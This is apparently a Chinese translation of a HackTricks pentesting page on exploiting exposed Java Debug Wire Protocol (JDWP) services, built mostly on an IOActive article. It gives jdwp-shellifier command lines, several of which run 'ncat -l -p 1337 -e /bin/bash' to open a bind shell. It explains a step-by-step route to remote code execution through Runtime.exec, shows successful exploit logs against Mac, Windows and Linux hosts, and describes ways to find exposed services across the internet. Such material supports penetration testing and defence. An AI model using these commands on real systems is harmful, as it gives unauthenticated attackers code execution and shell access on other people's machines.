hacktricks/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md

19 KiB
Raw Blame History

JDWP渗透测试 - Java调试线协议

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥

Exploiting

你可以使用位于https://github.com/IOActive/jdwp-shellifier的Python漏洞利用工具。

./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept

我发现使用--break-on 'java.lang.String.indexOf'可以使攻击更加稳定。如果你有机会上传一个后门到主机并执行它,而不是执行一个命令,那么攻击将更加稳定。

通常这个调试器在端口8000上运行如果你与该端口建立一个TCP连接并发送“JDWP-Handshake服务器应该用相同的字符串回应你。此外你可以在网络中检查这个字符串以找到可能的JDWP服务。

如果在一个java进程中找到字符串“jdwk”,很可能它已经激活了Java Debug Wired Protocol,你可能能够进行横向移动,甚至提升权限如果以root身份执行

更多细节

摘自https://ioactive.com/hacking-java-debug-wire-protocol-or-how/

Java Debug Wire Protocol

Java Platform Debug Architecture (JPDA)JDWP是全球Java调试系统Java Platform Debug Architecture (JPDA)[2]的一个组成部分。下面是整体架构的图示:

Debuggee由一个多线程的JVM组成运行我们的目标应用程序。为了能够进行远程调试JVM实例必须在命令行上显式地使用选项-Xdebug启动并使用选项-Xrunjdwp或-agentlib。例如启用远程调试的启动Tomcat服务器的命令如下

如架构图所示Java Debug Wire Protocol是调试器和JVM实例之间的中央链接。关于该协议的观察结果包括

  • 它是一个基于数据包的网络二进制协议。
  • 它大多是同步的。调试器发送一个命令到JDWP并期望接收到一个回复。然而一些命令如事件不需要同步响应。它们会在特定条件满足时发送一个回复。例如断点是一个事件。
  • 它不使用身份验证。
  • 它不使用加密。

所有这些观察结果都是合理的,因为我们谈论的是一个调试协议。然而,当这样的服务暴露在敌对网络上,或者面向互联网时,事情可能会出错。

握手JDWP规定[9]通信必须通过简单的握手来初始化。成功建立TCP连接后调试器客户端发送14个字符的ASCII字符串“JDWP-Handshake”。调试对象服务器通过发送完全相同的字符串来响应该消息。以下是scapy[3]跟踪显示的初始双向握手:

root:~/tools/scapy-hg # ip addr show dev eth0 | grep “inet “ inet 192.168.2.2/24 brd 192.168.2.255 scope global eth0root:~/tools/scapy-hg # ./run_scapy

Welcome to Scapy (2.2.0-dev)
>>> sniff(filter=”tcp port 8000 and host 192.168.2.9″, count=8)
<Sniffed: TCP:9 UDP:1 ICMP:0 Other:0>
>>> tcp.hexraw()
0000 15:49:30.397814 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 S
0001 15:49:30.402445 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 SA
0002 15:49:30.402508 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 A
0003 15:49:30.402601 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 PA / Raw
0000 4A 44 57 50 2D 48 61 6E 64 73 68 61 6B 65 JDWP-Handshake
0004 15:49:30.407553 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 A
0005 15:49:30.407557 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 A
0006 15:49:30.407557 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 PA / Raw
0000 4A 44 57 50 2D 48 61 6E 64 73 68 61 6B 65 JDWP-Handshake
0007 15:49:30.407636 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 A

有经验的安全审计员可能已经意识到这样一个简单的握手提供了一种在互联网上轻松发现活动的JDWP服务的方法。只需发送一个简单的探测包并检查特定的响应。更有趣的是在使用ShodanHQ[4]扫描时观察到了IBM Java Development Kit的行为服务器首先与上述相同的横幅进行“对话”。因此完全 passively 发现活动的JDWP服务是可能的本文稍后将介绍如何使用著名的Shodan进行

通信JDWP定义了调试器和调试对象之间的通信所涉及的消息[10]。这些消息遵循一个简单的结构,定义如下:

长度和ID字段相当明显。标志字段仅用于区分请求数据包和回复数据包值为0x80表示回复数据包。CommandSet字段定义了命令的类别如下表所示。
\

CommandSet ** Command**
0x40 JVM要执行的操作例如设置断点
0x400x7F 向调试器提供事件信息例如JVM已经触发了断点并正在等待进一步的操作
0x80 第三方扩展

考虑到我们想要执行任意代码,以下命令对我们的目的最有趣。

  • VirtualMachine/IDSizes定义了JVM处理的数据结构的大小。这是nmap脚本jdwp-exec.nse[11]无法工作的原因之一,因为该脚本使用了硬编码的大小。

  • ClassType/InvokeMethod允许您调用一个静态函数。

  • ObjectReference/InvokeMethod允许您调用JVM中实例化对象的函数。

  • StackFrame/(Get|Set)Values提供了从线程堆栈中推送/弹出的功能。

  • Event/Composite强制JVM对此命令声明的特定行为做出反应。该命令是调试目的的一个重要关键因为它允许设置断点在运行时通过线程进行单步调试并在访问/修改值时以与GDB或WinDBG完全相同的方式收到通知。 不仅可以使用JDWP访问和调用已经驻留在内存中的对象还可以创建或覆盖数据。

  • VirtualMachine/CreateString允许将字符串转换为在JVM运行时中存在的java.lang.String。

  • VirtualMachine/RedefineClasses允许安装新的类定义。

“我们拥有你的JDWP”

正如我们所见JDWP提供了内置命令可以将任意类加载到JVM内存中并调用已经存在和/或新加载的字节码。下面的部分将介绍在Python中创建利用代码的步骤该代码作为JDI前端的部分实现以尽可能可靠。独立的利用脚本的主要原因是作为渗透测试人员我喜欢“一击必杀”的利用。也就是说当我确定一个环境/应用程序/协议存在漏洞时我希望立即准备好利用它的工具即没有PoC这基本上是迄今为止唯一存在的东西。所以现在我们已经了解了理论知识让我们进入实际实现。当面对一个开放的JDWP服务时任意命令执行只有五个步骤之遥或者使用这个利用只需要一条命令行。下面是具体步骤1. 获取Java Runtime引用JVM通过引用来操作对象。因此我们的利用必须首先获取对java.lang.Runtime类的引用。从这个类中我们需要对getRuntime()方法的引用。这是通过获取所有类AllClasses数据包和我们正在查找的类中的所有方法ReferenceType/Methods数据包来完成的。2. 设置断点并等待通知异步调用这是我们利用的关键。为了调用任意代码我们需要处于运行线程上下文中。为此一个技巧是在已知在运行时调用的方法上设置断点。如前所述JDI中的断点是一个异步事件其类型设置为BREAKPOINT(0x02)。当命中时JVM会向我们的调试器发送一个EventData数据包其中包含我们的断点ID更重要的是命中它的线程的引用。

因此将其设置在经常调用的方法上是个好主意比如java.net.ServerSocket.accept()每次服务器接收到新的网络连接时都很可能调用该方法。然而必须记住它可以是运行时存在的任何方法。3. 在Runtime中分配Java String对象以执行有效载荷我们将在JVM运行时中执行代码因此我们操作的所有数据如字符串必须存在于JVM运行时中即具有运行时引用。通过发送CreateString命令很容易实现这一点。

  1. 从断点上下文中获取Runtime对象此时我们几乎拥有了成功、可靠的利用所需的所有元素。我们缺少的是一个Runtime对象引用。获取它很容易我们可以通过在JVM运行时中执行java.lang.Runtime.getRuntime()静态方法[8]发送ClassType/InvokeMethod数据包并提供Runtime类和线程引用来实现。5. 在Runtime实例中查找并调用exec()方法最后一步就是在前一步获得的Runtime静态对象中查找exec()方法并调用它通过发送ObjectReference/InvokeMethod数据包使用我们在第三步创建的String对象。

Et voilà!! 快速而简单。作为演示让我们启动一个启用了JPDA“调试模式”的Tomcat

root@pwnbox:~/apache-tomcat-6.0.39# ./bin/catalina.sh jpda start

我们执行脚本而不带任何要执行的命令,只是为了获取一般的系统信息:

hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.9
[+] Targeting 192.168.2.9:8000
[+] Reading settings for Java HotSpot(TM) 64-Bit Server VM  1.6.0_65
[+] Found Runtime class: id=466[+] Found Runtime.getRuntime(): id=7facdb6a8038
[+] Created break event id=2
[+] Waiting for an event on java.net.ServerSocket.accept## Here we wait for breakpoint to be triggered by a new connection ##
[+] Received matching event from thread 0x8b0
[+] Found Operating System Mac OS X
[+] Found User name pentestosx
[+] Found ClassPath /Users/pentestosx/Desktop/apache-tomcat-6.0.39/bin/bootstrap.jar
[+] Found User home directory /Users/pentestosx
[!] Command successfully executed

相同的命令行但针对Windows系统并在完全不同的方法上中断

hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.8 break-on java.lang.String.indexOf
[+] Targeting 192.168.2.8:8000
[+] Reading settings for Java HotSpot(TM) Client VM  1.7.0_51
[+] Found Runtime class: id=593
[+] Found Runtime.getRuntime(): id=17977a9c
[+] Created break event id=2
[+] Waiting for an event on java.lang.String.indexOf
[+] Received matching event from thread 0x8f5
[+] Found Operating System Windows 7
[+] Found User name hugsy
[+] Found ClassPath C:UsershugsyDesktopapache-tomcat-6.0.39binbootstrap.jar
[+] Found User home directory C:Usershugsy
[!] Command successfully executed

我们执行我们的利用程序在Linux系统上生成一个绑定shell使用有效载荷“ncat -e /bin/bash -l -p 1337”

hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.8 cmd ncat -l -p 1337 -e /bin/bash
[+] Targeting 192.168.2.8:8000
[+] Reading settings for OpenJDK Client VM  1.6.0_27
[+] Found Runtime class: id=79d
[+] Found Runtime.getRuntime(): id=8a1f5e0
[+] Created break event id=2
[+] Waiting for an event on java.net.ServerSocket.accept
[+] Received matching event from thread 0x82a[+] Selected payload ncat -l -p 1337 -e /bin/bash
[+] Command string object created id:82b
[+] Runtime.getRuntime() returned context id:0x82c
[+] found Runtime.exec(): id=8a1f5fc[+] Runtime.exec() successful, retId=82d
[!] Command successfully executed Success, we now have a listening socket!
root@pwnbox:~/apache-tomcat-6.0.39# netstat -ntpl | grep 1337
tcp        0      0 0.0.0.0:1337         0.0.0.0:*               LISTEN      19242/ncat
tcp6       0      0 :::1337              :::*                    LISTEN      19242/ncat

最终的攻击利用了这些技术,并添加了一些检查,并发送挂起/恢复信号,以尽可能少地造成干扰(最好不要破坏你正在工作的应用程序,对吧?)。它有两种模式:

  • “默认”模式完全不会干扰只是执行Java代码以获取本地系统信息非常适合向客户提供PoC
  • 通过传递“cmd”选项在远程主机上执行系统命令因此更具侵入性。命令是使用JVM正在运行的特权执行的。

这个攻击脚本已成功测试过:

  • Oracle Java JDK 1.6和1.7
  • OpenJDK 1.6
  • IBM JDK 1.6

由于Java在设计上是跨平台的可以在Java支持的任何操作系统上执行命令。对于我们渗透测试人员来说这实际上是个好消息开放的JDWP服务意味着可靠的远程代码执行。到目前为止,一切顺利。

现实生活中的利用情况如何?

事实上JDWP在Java应用程序世界中被广泛使用。然而在进行远程评估时渗透测试人员可能不经常遇到它因为防火墙通常会阻止它运行的端口。但这并不意味着JDWP在野外找不到

  • 在撰写本文时快速在ShodanHQ[4]上搜索立即显示大约有40个服务器发送JDWP握手

这实际上是一个有趣的发现,因为正如我们之前所见,应该是客户端(调试器)发起对话。

  • GitHub[7]也显示了大量潜在易受攻击的开源应用程序:

  • 对互联网进行特定端口tcp/8000、tcp/8080、tcp/8787、tcp/5005的masscan扫描发现许多主机无法在此报告响应了初始握手。
  • 在野外发现了一些“企业”应用程序默认运行JDWP服务查找实际端口号留给好奇的读者作为练习

这只是发现互联网上开放的JDWP服务的几种方法。这是一个很好的提醒应用程序应定期进行彻底的安全审查生产环境应关闭任何调试功能并配置防火墙仅限制对正常操作所需的服务的访问。允许任何人连接到JDWP服务与允许连接到gdbserver服务完全相同可能更稳定。希望您喜欢阅读本文就像我喜欢玩JDWP一样。祝所有强大的海盗们快乐的JDWP控制

感谢

我要感谢Ilja Van Sprundel和Sebastien Macke的想法和测试。

参考资料:

  1. https://github.com/IOActive/jdwp-shellifier
  2. http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html
  3. http://www.secdev.org/projects/scapy不再活跃
  4. http://www.shodanhq.com/search?q=JDWP-HANDSHAKE
  5. http://www.hsc-news.com/archives/2013/000109.html不再活跃
  6. http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt
  7. https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults
  8. http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
  9. http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
  10. http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html
  11. http://nmap.org/nsedoc/scripts/jdwp-exec.html
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥